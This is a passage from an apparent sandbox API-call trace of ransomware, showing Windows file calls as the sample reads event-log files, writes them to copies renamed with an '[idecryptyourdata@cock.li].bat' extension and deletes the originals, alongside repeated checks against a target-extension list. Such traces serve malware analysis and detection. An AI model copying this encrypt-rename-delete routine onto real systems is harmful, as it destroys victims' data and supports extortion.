lpOverlapped=0x0) returned 1 [0063.006] WriteFile (in: hFile=0x2c0, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x11010, lpOverlapped=0x0) returned 1 [0063.007] ReadFile (in: hFile=0x380, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.007] WriteFile (in: hFile=0x2c0, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x138, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x138, lpOverlapped=0x0) returned 1 [0063.007] SetEndOfFile (hFile=0x2c0) returned 1 [0063.007] CloseHandle (hObject=0x2c0) returned 1 [0063.009] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.009] SetEndOfFile (hFile=0x380) returned 1 [0063.010] CloseHandle (hObject=0x380) returned 1 [0063.010] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0063.010] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx")) returned 1 [0063.011] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0063.011] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0063.011] lstrlenW (lpString=".doc") returned 4 [0063.011] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0063.011] lstrlenW (lpString=".docx") returned 5 [0063.011] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0063.011] lstrlenW (lpString=".pdf") returned 4 [0063.011] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0063.011] lstrlenW (lpString=".xls") returned 4 [0063.011] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0063.011] lstrlenW (lpString=".xlsx") returned 5 [0063.011] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0063.011] lstrlenW (lpString=".ppt") returned 4 [0063.011] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0063.011] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0063.011] lstrlenW (lpString=".zip") returned 4 [0063.011] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0063.011] lstrlenW (lpString=".rar") returned 4 [0063.011] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0063.011] lstrlenW (lpString=".bz2") returned 4 [0063.011] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0063.011] lstrlenW (lpString=".7z") returned 3 [0063.011] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0063.011] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0063.011] lstrlenW (lpString=".dbf") returned 4 [0063.011] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0063.011] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0063.011] lstrlenW (lpString=".1cd") returned 4 [0063.011] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0063.011] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0063.011] lstrlenW (lpString=".jpg") returned 4 [0063.011] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0063.012] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0063.012] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0063.012] lstrlenW (lpString=".doc") returned 4 [0063.012] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0063.012] lstrlenW (lpString=".docx") returned 5 [0063.012] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0063.012] lstrlenW (lpString=".pdf") returned 4 [0063.012] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0063.012] lstrlenW (lpString=".xls") returned 4 [0063.012] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0063.012] lstrlenW (lpString=".xlsx") returned 5 [0063.012] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0063.012] lstrlenW (lpString=".ppt") returned 4 [0063.012] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0063.012] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0063.012] lstrlenW (lpString=".zip") returned 4 [0063.012] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0063.012] lstrlenW (lpString=".rar") returned 4 [0063.012] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0063.012] lstrlenW (lpString=".bz2") returned 4 [0063.012] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0063.012] lstrlenW (lpString=".7z") returned 3 [0063.012] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0063.012] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0063.012] lstrlenW (lpString=".dbf") returned 4 [0063.012] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0063.012] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0063.013] lstrlenW (lpString=".1cd") returned 4 [0063.013] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0063.013] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 58 [0063.013] lstrlenW (lpString=".jpg") returned 4 [0063.013] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0063.013] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0063.013] lstrlenW (lpString="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 56 [0063.013] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0063.013] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=2166784) returned 1 [0063.013] CloseHandle (hObject=0x380) returned 1 [0063.013] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx")) returned 0x20 [0063.013] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0063.014] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 1 [0063.014] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0063.014] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fc64 | out: lpNewFilePointer=0x0) returned 1 [0063.014] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fc24 | out: lpNewFilePointer=0x0) returned 1 [0063.014] ReadFile (in: hFile=0x380, lpBuffer=0x3f14058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x320fc30, lpOverlapped=0x0 | out: lpBuffer=0x3f14058*, lpNumberOfBytesRead=0x320fc30*=0x40000, lpOverlapped=0x0) returned 1 [0063.016] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0xb0555, lpNewFilePointer=0x0, dwMoveMethod=0x320fc24 | out: lpNewFilePointer=0x0) returned 1 [0063.016] ReadFile (in: hFile=0x380, lpBuffer=0x3f54058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x320fc30, lpOverlapped=0x0 | out: lpBuffer=0x3f54058*, lpNumberOfBytesRead=0x320fc30*=0x40000, lpOverlapped=0x0) returned 1 [0063.018] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x320fc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.018] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x1d1000, lpNewFilePointer=0x0, dwMoveMethod=0x320fc24 | out: lpNewFilePointer=0x0) returned 1 [0063.018] ReadFile (in: hFile=0x380, lpBuffer=0x3f94058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x320fc30, lpOverlapped=0x0 | out: lpBuffer=0x3f94058*, lpNumberOfBytesRead=0x320fc30*=0x40000, lpOverlapped=0x0) returned 1 [0063.462] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.462] WriteFile (in: hFile=0x380, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0xc015c, lpNumberOfBytesWritten=0x320fca8, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fca8*=0xc015c, lpOverlapped=0x0) returned 1 [0063.473] SetEndOfFile (hFile=0x380) returned 1 [0063.473] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x43c4e68 [0063.889] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fc74 | out: lpNewFilePointer=0x0) returned 1 [0063.889] WriteFile (in: hFile=0x380, lpBuffer=0x43c4e68*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x320fc80, lpOverlapped=0x0 | out: lpBuffer=0x43c4e68*, lpNumberOfBytesWritten=0x320fc80*=0x40000, lpOverlapped=0x0) returned 1 [0063.891] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0xb0555, lpNewFilePointer=0x0, dwMoveMethod=0x320fc74 | out: lpNewFilePointer=0x0) returned 1 [0063.891] WriteFile (in: hFile=0x380, lpBuffer=0x43c4e68*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x320fc80, lpOverlapped=0x0 | out: lpBuffer=0x43c4e68*, lpNumberOfBytesWritten=0x320fc80*=0x40000, lpOverlapped=0x0) returned 1 [0063.892] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x1d1000, lpNewFilePointer=0x0, dwMoveMethod=0x320fc74 | out: lpNewFilePointer=0x0) returned 1 [0063.892] WriteFile (in: hFile=0x380, lpBuffer=0x43c4e68*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x320fc80, lpOverlapped=0x0 | out: lpBuffer=0x43c4e68*, lpNumberOfBytesWritten=0x320fc80*=0x40000, lpOverlapped=0x0) returned 1 [0063.894] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43c4e68 | out: hHeap=0x5d0000) returned 1 [0063.894] CloseHandle (hObject=0x380) returned 1 [0065.783] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0065.783] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0065.783] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0065.783] lstrlenW (lpString=".doc") returned 4 [0065.783] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0065.783] lstrlenW (lpString=".docx") returned 5 [0065.783] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0065.783] lstrlenW (lpString=".pdf") returned 4 [0065.783] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0065.783] lstrlenW (lpString=".xls") returned 4 [0065.783] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0065.783] lstrlenW (lpString=".xlsx") returned 5 [0065.783] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0065.783] lstrlenW (lpString=".ppt") returned 4 [0065.783] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0065.784] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0065.784] lstrlenW (lpString=".zip") returned 4 [0065.784] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0065.784] lstrlenW (lpString=".rar") returned 4 [0065.784] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0065.784] lstrlenW (lpString=".bz2") returned 4 [0065.784] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0065.784] lstrlenW (lpString=".7z") returned 3 [0065.784] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0065.784] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0065.784] lstrlenW (lpString=".dbf") returned 4 [0065.784] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0065.784] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0065.784] lstrlenW (lpString=".1cd") returned 4 [0065.784] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0065.784] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0065.784] lstrlenW (lpString=".jpg") returned 4 [0065.784] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0065.784] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0065.784] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0065.784] lstrlenW (lpString=".doc") returned 4 [0065.784] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0065.784] lstrlenW (lpString=".docx") returned 5 [0065.784] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0065.784] lstrlenW (lpString=".pdf") returned 4 [0065.784] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0065.784] lstrlenW (lpString=".xls") returned 4 [0065.785] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0065.785] lstrlenW (lpString=".xlsx") returned 5 [0065.785] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0065.785] lstrlenW (lpString=".ppt") returned 4 [0065.785] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0065.785] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0065.785] lstrlenW (lpString=".zip") returned 4 [0065.785] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0065.785] lstrlenW (lpString=".rar") returned 4 [0065.785] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0065.785] lstrlenW (lpString=".bz2") returned 4 [0065.785] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0065.785] lstrlenW (lpString=".7z") returned 3 [0065.785] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0065.785] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0065.785] lstrlenW (lpString=".dbf") returned 4 [0065.785] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0065.785] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0065.785] lstrlenW (lpString=".1cd") returned 4 [0065.785] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0065.785] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx") returned 64 [0065.785] lstrlenW (lpString=".jpg") returned 4 [0065.785] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0065.785] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0065.786] lstrlenW (lpString="Microsoft-Windows-International%4Operational.evtx") returned 49 [0065.786] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0065.873] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=69632) returned 1 [0065.873] CloseHandle (hObject=0x370) returned 1 [0065.873] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx")) returned 0x20 [0065.873] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0065.873] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0065.873] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.874] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.874] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0065.874] GetLastError () returned 0x0 [0065.874] ReadFile (in: hFile=0x370, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x11000, lpOverlapped=0x0) returned 1 [0065.876] WriteFile (in: hFile=0x398, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x11010, lpOverlapped=0x0) returned 1 [0065.878] ReadFile (in: hFile=0x370, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.878] WriteFile (in: hFile=0x398, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x136, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x136, lpOverlapped=0x0) returned 1 [0065.878] SetEndOfFile (hFile=0x398) returned 1 [0065.878] CloseHandle (hObject=0x398) returned 1 [0065.880] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.880] SetEndOfFile (hFile=0x370) returned 1 [0065.881] CloseHandle (hObject=0x370) returned 1 [0065.881] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0065.882] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx")) returned 1 [0065.882] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0065.882] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0065.882] lstrlenW (lpString=".doc") returned 4 [0065.882] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0065.882] lstrlenW (lpString=".docx") returned 5 [0065.882] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0065.882] lstrlenW (lpString=".pdf") returned 4 [0065.882] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0065.882] lstrlenW (lpString=".xls") returned 4 [0065.882] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0065.882] lstrlenW (lpString=".xlsx") returned 5 [0065.882] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0065.882] lstrlenW (lpString=".ppt") returned 4 [0065.882] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0065.882] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0065.882] lstrlenW (lpString=".zip") returned 4 [0065.882] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0065.882] lstrlenW (lpString=".rar") returned 4 [0065.882] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0065.883] lstrlenW (lpString=".bz2") returned 4 [0065.883] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0065.883] lstrlenW (lpString=".7z") returned 3 [0065.883] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0065.883] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0065.883] lstrlenW (lpString=".dbf") returned 4 [0065.883] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0065.883] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0065.883] lstrlenW (lpString=".1cd") returned 4 [0065.883] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0065.883] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0065.883] lstrlenW (lpString=".jpg") returned 4 [0065.883] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0065.883] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0065.883] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0065.883] lstrlenW (lpString=".doc") returned 4 [0065.883] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0065.883] lstrlenW (lpString=".docx") returned 5 [0065.883] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0065.883] lstrlenW (lpString=".pdf") returned 4 [0065.883] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0065.883] lstrlenW (lpString=".xls") returned 4 [0065.883] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0065.883] lstrlenW (lpString=".xlsx") returned 5 [0065.883] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0065.883] lstrlenW (lpString=".ppt") returned 4 [0065.883] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0065.883] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0065.883] lstrlenW (lpString=".zip") returned 4 [0065.883] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0065.884] lstrlenW (lpString=".rar") returned 4 [0065.884] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0065.884] lstrlenW (lpString=".bz2") returned 4 [0065.884] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0065.884] lstrlenW (lpString=".7z") returned 3 [0065.884] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0065.884] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0065.884] lstrlenW (lpString=".dbf") returned 4 [0065.884] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0065.884] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0065.884] lstrlenW (lpString=".1cd") returned 4 [0065.884] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0065.884] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0065.884] lstrlenW (lpString=".jpg") returned 4 [0065.884] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0065.884] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0065.884] lstrlenW (lpString="Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 42 [0065.884] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0065.885] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=69632) returned 1 [0065.885] CloseHandle (hObject=0x370) returned 1 [0065.885] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx")) returned 0x20 [0065.885] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0065.886] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0065.886] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.886] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.886] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0065.894] GetLastError () returned 0x0 [0065.894] ReadFile (in: hFile=0x370, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x11000, lpOverlapped=0x0) returned 1 [0065.896] WriteFile (in: hFile=0x398, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: 